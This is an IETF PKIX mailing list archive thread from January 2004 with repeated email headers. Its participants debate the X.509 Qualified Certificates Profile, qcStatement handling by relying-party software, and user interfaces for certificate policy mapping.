Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard
"Anders Rundgren" <anders.rundgren@telia.com> Sat, 31 January 2004 12:57 UTC
Received: from above.proper.com (above.proper.com [208.184.76.39]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA19847 for <pkix-archive@lists.ietf.org>; Sat, 31 Jan 2004 07:57:26 -0500 (EST)
Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VC4Gp5056543; Sat, 31 Jan 2004 04:04:16 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org)
Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0VC4GKc056542; Sat, 31 Jan 2004 04:04:16 -0800 (PST)
X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f
Received: from av3-1-sn4.m-sp.skanova.net (av3-1-sn4.m-sp.skanova.net [81.228.10.114]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VC4FNd056500 for <ietf-pkix@imc.org>; Sat, 31 Jan 2004 04:04:15 -0800 (PST) (envelope-from anders.rundgren@telia.com)
Received: by av3-1-sn4.m-sp.skanova.net (Postfix, from userid 502) id 4C57737E9D; Sat, 31 Jan 2004 13:04:10 +0100 (CET)
Received: from smtp2.fre.skanova.net (smtp2.fre.skanova.net [195.67.227.95]) by av3-1-sn4.m-sp.skanova.net (Postfix) with ESMTP id 2B5A937E43; Sat, 31 Jan 2004 13:04:10 +0100 (CET)
Received: from arport (t8o913p19.telia.com [213.64.26.139]) by smtp2.fre.skanova.net (8.12.10/8.12.10) with SMTP id i0VC48VM012175; Sat, 31 Jan 2004 13:04:08 +0100 (CET)
Message-ID: <013301c3e7f1$8e194060$0500a8c0@arport>
From: Anders Rundgren <anders.rundgren@telia.com>
To: Stefan Santesson <stefans@microsoft.com>, ietf-pkix@imc.org
References: <0C3042E92D8A714783E2C44AB9936E1D1A6313@EUR-MSG-03.europe.corp.microsoft.com>
Subject: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard
Date: Sat, 31 Jan 2004 12:58:34 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-ietf-pkix@mail.imc.org
Precedence: bulk
List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/>
List-ID: <ietf-pkix.imc.org>
List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe>
Content-Transfer-Encoding: 8bit
Stefan, >There is nothing in the IETF profile that mandates use of qcStatement extension. No, but if you do, you get this side-effect, don't you? And a software package that is said to be compliant with a standard must be prepared to cope with the entire standard, not just the part that the developer thinks are useful. How can a relying part sw. dev. have any opinion about things that are completely out of his/her control? The bottom line is: If qcStatements contain anything beyond "decoration" (who nees that ecept DoD?), they MUST be dealt with. This will require yet another GUI awkward admin. Unless they are unform fore the entire policy. This I cannot find support for in the draft. Anders Från: Anders Rundgren [mailto:anders.rundgren@telia.com] Skickat: lö 1/31/2004 12:29 Till: Stefan Santesson; ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Stefan, You are perfectly right, the document says nothing about this. But You did in a recent ETSI posting: "The purpose of the qcStatement is to be used AFTER successful path validation to support programmatic detection if the certificate should be accepted as a QC or not" "The consumer of this function could be a UI display function or some policy module determining the suitability of a certificate for a certain purpose" But "programmatic detection if a certificate should be accepted as a QC or not" is equivalent to a extra path-validation step. This requires nothing less than a tree-dimensional trust-config/admin system (trust anchor, existing policy management, qcStatements). If an automated recipient does not support all three it can hardly call itself QC-compliant, making this functionality a MUST regardless if extensions are marked critical or not. Anders ----- Original Message ----- From: "Stefan Santesson" <stefans@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>; <ietf-pkix@imc.org> Sent: Saturday, January 31, 2004 12:17 Subject: SV: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Anders, After reading this a couple of times I still don't have a clue what your problem with the document is. I'm not aware of any part of the document promoting the kind of behaviour you are talking about. /Stefan ________________________________ Från: owner-ietf-pkix@mail.imc.org genom Anders Rundgren Skickat: fr 1/30/2004 4:05 Till: ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Claim: If qcStatements under a given CP OID are allowed to vary (to indicate deviations in the policy in some way) a conforming QC relying party should check the contents of the qcStatements for each EE-certificate in order to not accidentally accept something it might not appreciate. Consequence: Assuming that the majority of the "relying parties" actually are server- based automated recipients like e-government services, it means that most QC-compliant relying party software MUST support qcStatement- filtering (which is exactly like an extra path validation procedure), or it requires RP security administrators to be discriminative about what QC CAs it should accept. I find this requirement unreasonable. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VC4Gp5056543; Sat, 31 Jan 2004 04:04:16 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0VC4GKc056542; Sat, 31 Jan 2004 04:04:16 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av3-1-sn4.m-sp.skanova.net (av3-1-sn4.m-sp.skanova.net [81.228.10.114]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VC4FNd056500 for <ietf-pkix@imc.org>; Sat, 31 Jan 2004 04:04:15 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av3-1-sn4.m-sp.skanova.net (Postfix, from userid 502) id 4C57737E9D; Sat, 31 Jan 2004 13:04:10 +0100 (CET) Received: from smtp2.fre.skanova.net (smtp2.fre.skanova.net [195.67.227.95]) by av3-1-sn4.m-sp.skanova.net (Postfix) with ESMTP id 2B5A937E43; Sat, 31 Jan 2004 13:04:10 +0100 (CET) Received: from arport (t8o913p19.telia.com [213.64.26.139]) by smtp2.fre.skanova.net (8.12.10/8.12.10) with SMTP id i0VC48VM012175; Sat, 31 Jan 2004 13:04:08 +0100 (CET) Message-ID: <013301c3e7f1$8e194060$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Stefan Santesson" <stefans@microsoft.com>, <ietf-pkix@imc.org> References: <0C3042E92D8A714783E2C44AB9936E1D1A6313@EUR-MSG-03.europe.corp.microsoft.com> Subject: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Date: Sat, 31 Jan 2004 12:58:34 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Stefan, >There is nothing in the IETF profile that mandates use of qcStatement extension. No, but if you do, you get this side-effect, don't you? And a software package that is said to be compliant with a standard must be prepared to cope with the entire standard, not just the part that the developer thinks are useful. How can a relying part sw. dev. have any opinion about things that are completely out of his/her control? The bottom line is: If qcStatements contain anything beyond "decoration" (who nees that ecept DoD?), they MUST be dealt with. This will require yet another GUI awkward admin. Unless they are unform fore the entire policy. This I cannot find support for in the draft. Anders Från: Anders Rundgren [mailto:anders.rundgren@telia.com] Skickat: lö 1/31/2004 12:29 Till: Stefan Santesson; ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Stefan, You are perfectly right, the document says nothing about this. But You did in a recent ETSI posting: "The purpose of the qcStatement is to be used AFTER successful path validation to support programmatic detection if the certificate should be accepted as a QC or not" "The consumer of this function could be a UI display function or some policy module determining the suitability of a certificate for a certain purpose" But "programmatic detection if a certificate should be accepted as a QC or not" is equivalent to a extra path-validation step. This requires nothing less than a tree-dimensional trust-config/admin system (trust anchor, existing policy management, qcStatements). If an automated recipient does not support all three it can hardly call itself QC-compliant, making this functionality a MUST regardless if extensions are marked critical or not. Anders ----- Original Message ----- From: "Stefan Santesson" <stefans@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>; <ietf-pkix@imc.org> Sent: Saturday, January 31, 2004 12:17 Subject: SV: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Anders, After reading this a couple of times I still don't have a clue what your problem with the document is. I'm not aware of any part of the document promoting the kind of behaviour you are talking about. /Stefan ________________________________ Från: owner-ietf-pkix@mail.imc.org genom Anders Rundgren Skickat: fr 1/30/2004 4:05 Till: ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Claim: If qcStatements under a given CP OID are allowed to vary (to indicate deviations in the policy in some way) a conforming QC relying party should check the contents of the qcStatements for each EE-certificate in order to not accidentally accept something it might not appreciate. Consequence: Assuming that the majority of the "relying parties" actually are server- based automated recipients like e-government services, it means that most QC-compliant relying party software MUST support qcStatement- filtering (which is exactly like an extra path validation procedure), or it requires RP security administrators to be discriminative about what QC CAs it should accept. I find this requirement unreasonable. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VBe9Pd054722; Sat, 31 Jan 2004 03:40:09 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0VBe9TD054721; Sat, 31 Jan 2004 03:40:09 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail-dub.microsoft.com (mail-dub.microsoft.com [213.199.128.160]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VBe5K1054705 for <ietf-pkix@imc.org>; Sat, 31 Jan 2004 03:40:07 -0800 (PST) (envelope-from stefans@microsoft.com) Received: from dub-imc-01.europe.corp.microsoft.com ([65.53.196.35]) by mail-dub.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Sat, 31 Jan 2004 11:40:05 +0000 Received: from 65.53.196.35 by dub-imc-01.europe.corp.microsoft.com (InterScan E-Mail VirusWall NT); Sat, 31 Jan 2004 11:40:05 -0000 Received: from EUR-MSG-03.europe.corp.microsoft.com ([65.53.192.44]) by dub-imc-01.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Sat, 31 Jan 2004 11:40:05 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: SV: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Date: Sat, 31 Jan 2004 11:38:50 -0000 Message-ID: <0C3042E92D8A714783E2C44AB9936E1D1A6313@EUR-MSG-03.europe.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Thread-Index: AcPn7lotdsmFJzVEQLS2dtk4UBXACgAAHHSr From: "Stefan Santesson" <stefans@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>, <ietf-pkix@imc.org> X-OriginalArrivalTime: 31 Jan 2004 11:40:05.0154 (UTC) FILETIME=[F85C5820:01C3E7EE] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0VBe8K1054715 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Your are posting to the wrong list. There is nothing in the IETF profile that mandates use of qcStatement extension. /Stefan ________________________________ Från: Anders Rundgren [mailto:anders.rundgren@telia.com] Skickat: lö 1/31/2004 12:29 Till: Stefan Santesson; ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Stefan, You are perfectly right, the document says nothing about this. But You did in a recent ETSI posting: "The purpose of the qcStatement is to be used AFTER successful path validation to support programmatic detection if the certificate should be accepted as a QC or not" "The consumer of this function could be a UI display function or some policy module determining the suitability of a certificate for a certain purpose" But "programmatic detection if a certificate should be accepted as a QC or not" is equivalent to a extra path-validation step. This requires nothing less than a tree-dimensional trust-config/admin system (trust anchor, existing policy management, qcStatements). If an automated recipient does not support all three it can hardly call itself QC-compliant, making this functionality a MUST regardless if extensions are marked critical or not. Anders ----- Original Message ----- From: "Stefan Santesson" <stefans@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>; <ietf-pkix@imc.org> Sent: Saturday, January 31, 2004 12:17 Subject: SV: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Anders, After reading this a couple of times I still don't have a clue what your problem with the document is. I'm not aware of any part of the document promoting the kind of behaviour you are talking about. /Stefan ________________________________ Från: owner-ietf-pkix@mail.imc.org genom Anders Rundgren Skickat: fr 1/30/2004 4:05 Till: ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Claim: If qcStatements under a given CP OID are allowed to vary (to indicate deviations in the policy in some way) a conforming QC relying party should check the contents of the qcStatements for each EE-certificate in order to not accidentally accept something it might not appreciate. Consequence: Assuming that the majority of the "relying parties" actually are server- based automated recipients like e-government services, it means that most QC-compliant relying party software MUST support qcStatement- filtering (which is exactly like an extra path validation procedure), or it requires RP security administrators to be discriminative about what QC CAs it should accept. I find this requirement unreasonable. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VBZVwI054205; Sat, 31 Jan 2004 03:35:31 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0VBZVSi054204; Sat, 31 Jan 2004 03:35:31 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av7-2-sn4.m-sp.skanova.net (av7-2-sn4.m-sp.skanova.net [81.228.10.109]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VBZUkn054183 for <ietf-pkix@imc.org>; Sat, 31 Jan 2004 03:35:30 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av7-2-sn4.m-sp.skanova.net (Postfix, from userid 502) id E5E1237E5C; Sat, 31 Jan 2004 12:35:24 +0100 (CET) Received: from smtp2.fre.skanova.net (smtp2.fre.skanova.net [195.67.227.95]) by av7-2-sn4.m-sp.skanova.net (Postfix) with ESMTP id C796737E5C; Sat, 31 Jan 2004 12:35:24 +0100 (CET) Received: from arport (t8o913p114.telia.com [213.64.26.234]) by smtp2.fre.skanova.net (8.12.10/8.12.10) with SMTP id i0VBZIVM001609; Sat, 31 Jan 2004 12:35:18 +0100 (CET) Message-ID: <012501c3e7ed$89caf1b0$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Stefan Santesson" <stefans@microsoft.com>, <ietf-pkix@imc.org> References: <0C3042E92D8A714783E2C44AB9936E1D1A6312@EUR-MSG-03.europe.corp.microsoft.com> Subject: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Date: Sat, 31 Jan 2004 12:29:43 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Stefan, You are perfectly right, the document says nothing about this. But You did in a recent ETSI posting: "The purpose of the qcStatement is to be used AFTER successful path validation to support programmatic detection if the certificate should be accepted as a QC or not" "The consumer of this function could be a UI display function or some policy module determining the suitability of a certificate for a certain purpose" But "programmatic detection if a certificate should be accepted as a QC or not" is equivalent to a extra path-validation step. This requires nothing less than a tree-dimensional trust-config/admin system (trust anchor, existing policy management, qcStatements). If an automated recipient does not support all three it can hardly call itself QC-compliant, making this functionality a MUST regardless if extensions are marked critical or not. Anders ----- Original Message ----- From: "Stefan Santesson" <stefans@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>; <ietf-pkix@imc.org> Sent: Saturday, January 31, 2004 12:17 Subject: SV: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Anders, After reading this a couple of times I still don't have a clue what your problem with the document is. I'm not aware of any part of the document promoting the kind of behaviour you are talking about. /Stefan ________________________________ Från: owner-ietf-pkix@mail.imc.org genom Anders Rundgren Skickat: fr 1/30/2004 4:05 Till: ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Claim: If qcStatements under a given CP OID are allowed to vary (to indicate deviations in the policy in some way) a conforming QC relying party should check the contents of the qcStatements for each EE-certificate in order to not accidentally accept something it might not appreciate. Consequence: Assuming that the majority of the "relying parties" actually are server- based automated recipients like e-government services, it means that most QC-compliant relying party software MUST support qcStatement- filtering (which is exactly like an extra path validation procedure), or it requires RP security administrators to be discriminative about what QC CAs it should accept. I find this requirement unreasonable. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VBHZbH052646; Sat, 31 Jan 2004 03:17:35 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0VBHZvR052645; Sat, 31 Jan 2004 03:17:35 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail-dub.microsoft.com (mail-dub.microsoft.com [213.199.128.160]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0VBHXBR052634 for <ietf-pkix@imc.org>; Sat, 31 Jan 2004 03:17:33 -0800 (PST) (envelope-from stefans@microsoft.com) Received: from dub-imc-01.europe.corp.microsoft.com ([65.53.196.35]) by mail-dub.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Sat, 31 Jan 2004 11:17:31 +0000 Received: from 65.53.196.35 by dub-imc-01.europe.corp.microsoft.com (InterScan E-Mail VirusWall NT); Sat, 31 Jan 2004 11:17:31 -0000 Received: from EUR-MSG-03.europe.corp.microsoft.com ([65.53.192.44]) by dub-imc-01.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Sat, 31 Jan 2004 11:17:31 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: SV: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Date: Sat, 31 Jan 2004 11:17:34 -0000 Message-ID: <0C3042E92D8A714783E2C44AB9936E1D1A6312@EUR-MSG-03.europe.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Thread-Index: AcPnX/mVJFliJHULSUSeu8ENHCY8gwAirTc+ From: "Stefan Santesson" <stefans@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>, <ietf-pkix@imc.org> X-OriginalArrivalTime: 31 Jan 2004 11:17:31.0708 (UTC) FILETIME=[D1A4DFC0:01C3E7EB] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0VBHYBR052639 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders, After reading this a couple of times I still don't have a clue what your problem with the document is. I'm not aware of any part of the document promoting the kind of behaviour you are talking about. /Stefan ________________________________ Från: owner-ietf-pkix@mail.imc.org genom Anders Rundgren Skickat: fr 1/30/2004 4:05 Till: ietf-pkix@imc.org Ämne: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Claim: If qcStatements under a given CP OID are allowed to vary (to indicate deviations in the policy in some way) a conforming QC relying party should check the contents of the qcStatements for each EE-certificate in order to not accidentally accept something it might not appreciate. Consequence: Assuming that the majority of the "relying parties" actually are server- based automated recipients like e-government services, it means that most QC-compliant relying party software MUST support qcStatement- filtering (which is exactly like an extra path validation procedure), or it requires RP security administrators to be discriminative about what QC CAs it should accept. I find this requirement unreasonable. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UHI6Ev003443; Fri, 30 Jan 2004 09:18:06 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0UHI6v4003441; Fri, 30 Jan 2004 09:18:06 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av7-1-sn4.m-sp.skanova.net (av7-1-sn4.m-sp.skanova.net [81.228.10.110]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UHI5jw003405 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 09:18:05 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av7-1-sn4.m-sp.skanova.net (Postfix, from userid 502) id 9274537F17; Fri, 30 Jan 2004 18:17:58 +0100 (CET) Received: from smtp2-2-sn4.m-sp.skanova.net (smtp2-2-sn4.m-sp.skanova.net [81.228.10.182]) by av7-1-sn4.m-sp.skanova.net (Postfix) with ESMTP id 8461637ED4 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 18:17:58 +0100 (CET) Received: from arport (t8o913p54.telia.com [213.64.26.174]) by smtp2-2-sn4.m-sp.skanova.net (Postfix) with SMTP id BECB637E4D; Fri, 30 Jan 2004 18:17:55 +0100 (CET) Message-ID: <011a01c3e754$3b42ab80$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Peter Hesse" <pmhesse@geminisecurity.com>, "'David Cross'" <dcross@microsoft.com> Cc: <ietf-pkix@imc.org> References: <200401301515.KAA82670@osf1.gmu.edu> Subject: Re: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Date: Fri, 30 Jan 2004 18:12:00 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Peter, You are talking about the relying party in end-user terms. I am rather talking about the rp software and the rp security admin, i.e. the entities managing the infrastructure you are talking about. This part gets more critical if you are a medium-sized manufacturer and have 10000 suppliers of different sizes. That's the kind of scenarious I base my judgement on and also write software for. Anders ----- Original Message ----- From: "Peter Hesse" <pmhesse@geminisecurity.com> To: "'Anders Rundgren'" <anders.rundgren@telia.com>; "'David Cross'" <dcross@microsoft.com> Cc: <ietf-pkix@imc.org> Sent: Friday, January 30, 2004 16:15 Subject: RE: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Anders, When policy mappings are appropriately applied by the infrastructure, relying parties need only to know about their own domain policies. If I'm a user at "XYZ corp", I will know that there are three XYZ policies; "XYZ low", "XYZ medium", and "XYZ high". Even if the signer is someone from "Acme corp" with an "Acme External" certificate policy, the policy mappings should cause me to see it at "XYZ low"; I don't need to look at Acme's certificate policy document, my infrastructure has already done that and made their decision on how "Acme External" should be mapped to an XYZ policy. I do not understand what you think is a potential security hazard. The relying party's infrastructure is responsible for what the relying party trusts or does not trust. The relying party's infrastructure uses technical controls to control that trust, and the technical controls are in the certificates issued by the relying party's trust root. These controls include the certificate policies, policy mappings, policy constraints, basic constraints and name constraints extensions. Will this be useful to David's grandmother? No, of course not. David's grandmother has no need for this level of detail or assurance. (Not to mention she's probably using a $20 "your credit card number is good enough identity proofing for us" certificate.) A mutual fund manager who is responsible for $500 million in assets, or a battlefield commander responsible for the lives of thousands of soldiers probably *will* need this level of detail and assurance. --Peter +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Anders Rundgren Sent: Friday, January 30, 2004 4:37 AM To: David Cross; Peter Hesse Cc: ietf-pkix@imc.org Subject: Re: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Peter, If a sender of a signed message is using a certificate from a PKI that requires policy filtering by the relying party (be it a server or Outlook), then the sender creates a potential security hazard as the relying party after trust anchor installation is likely to also "trust" what effectively could be completely other types of certificates. One culprit is that there is no good universal way to communicate CA policy information, except by requiring relying parties to decipher CP documents, making the configuration process less user-friendly. That is, multiple policy PKIs are not unsuitable only for consumers like David's grandma, but in most open environments where many relying parties are involved. Regarding the user interface, you forgot to mention that the policy settings must be per CA or groups of CAs further complicating matters. But maybe, we are really talking local PKIs here? Anders ----- Original Message ----- From: "David Cross" <dcross@microsoft.com> To: "Peter Hesse" <pmhesse@geminisecurity.com> Cc: <ietf-pkix@imc.org> Sent: Thursday, January 29, 2004 19:30 Subject: RE: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Your 2 cents may not be too far off the mark...however, some comments... A. Today, in a Windows XP+ and Windows Server 2003 environment, we do have the capability to configure an Active Directory (domain) environment as you describe. I agree this is an example of the direction you describe. B. Technically, this also exists in most chaining engines and UI, although the policy information is not exposed as a first class citizen, argueably for several reasons such as my grandmother just is not interested in policy status of my signed mail to her, but I digress... Items C. and D. are the slippery slope that have obvious utility in the enterprise and/or high assurance environments, but not in the general global consumer community. My grandmother just won't understand the meaning of "initial-policy-mapping-inhibit" no matter how much she loves me. David B. Cross -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Hesse Sent: Thursday, January 29, 2004 7:05 AM To: 'Anders Rundgren'; 'Steve Hanna'; 'Stephen Kent' Cc: ietf-pkix@imc.org Subject: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) I'll take the bait and throw this idea out there for you all to think about. It's not entirely my idea, it is based on ideas discussed with Dave Fillingham over the years. Let's assume for the moment that you're working with a PKI with a few different certificate policies in use; they might be hardware/software stored keys, or high/medium/low assurance. It is my suggestion that for a majority of PKI-enabled products with user interfaces, the best solution may be to do the following: A) Provide an administrative interface to map certificate policy OIDs to human readable names, and potentially human readable descriptions of the policies as well. B) When building/validating certification paths, set the initial-policy-set to any policy. When a path successfully validates, display the signature and validation status to the user, along with the human readable names for the policies in the authority-constrained-policy-set, or an indication that the path was not valid under any known policies. If these steps are followed, the user can just be informed that the message they received was valid for "Gemini medium assurance" or something like that. Not much difficulty to implement, nor would it be too difficult to educate the users. Now, assume we're dealing with a PKI larger than a single organization, where there are differing certificate policies and appropriate certificate policy mappings in place. (Such as a Bridge CA environment.) I'm assuming in this case that all certificates that I want my relying parties to accept would have certificate policies asserted. In this case, we add just two more steps: C) When validating paths, set initial-explicit-policy to TRUE, to ensure that only paths valid for a policy would be accepted. (Or, set requireExplicitPolicy through policyConstraints extensions in domain or cross-certificates.) D) Provide users with a switch to enable/disable initial-policy-mapping-inhibit. This may be referred to as "allow only my organization" and "allow other organizations". I'm presuming that cross-certificates would fail to validate if require-explicit was true and policy mappings don't take place. Likewise, even if I received a message from a user from a different organization, I would simply see that the message validated and that it was valid under the "Gemini low assurance policy" or something similar. This doesn't add much implementation difficulty (assuming a compliant path processing system) or make it too confusing for the user. Just my $0.02. --Peter +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UHCgCJ002904; Fri, 30 Jan 2004 09:12:42 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0UHCg9E002903; Fri, 30 Jan 2004 09:12:42 -0800 